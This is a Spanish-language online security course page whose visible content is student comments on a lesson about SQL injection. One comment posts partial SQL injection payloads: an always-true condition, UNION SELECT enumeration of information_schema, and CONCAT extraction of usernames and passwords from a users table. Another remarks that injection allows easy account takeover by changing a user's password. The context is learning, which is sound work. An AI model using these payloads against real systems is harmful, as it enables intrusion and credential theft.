Aún no tienes acceso a esta clase

Crea una cuenta y continúa viendo este curso

Ataques de inyección de código para obtener información de los usuarios del sistema

29/33
Recursos

Aportes 9

Preguntas 4

Ordenar por:

¿Quieres ver más aportes, preguntas y respuestas de la comunidad? Crea una cuenta o inicia sesión.

Lo interesante del SQLi es que se puede ejecutar cualquier sentencia de DML y alterar la informacion de un registro, en otras palabras, un account takeover es facil ya que se cambia la clave de un usuario y listo, incluso si bien estoy instrucciones de DDL tambien es posible

Esta imagen esta todo lo que necesita un gestor de seguridad informatica.

SELECT first_name, last_name
FROM user_id = '%' or '0'='0'
UNION SELECT null, 
table_name FROM 
information_schema.tables 
WHERE table_name like 'user%'
# 

CONCAT (table_name,
0x0a,column_name)
FROM information_schema.columns
WHERE table_name = 'users' 

CONCAT (
first_name,0x0a,
last_name,0x0a, 
password,
FROM 'users' 
;```

Creo que necesito ver DB para entenderte
🤣🤣

No funciona el CONCAT

Aquí hay dos link para entender el SQL Inject
Link1
Link2

me sale un error que la funcion CONCAT no existe! como poder solucionar ?

Excelente clase

El problema de CONCAT al menos es mi caso es por un espacio que hay entre el CONCAT y los parentesis tiene que ser seguido el tipeo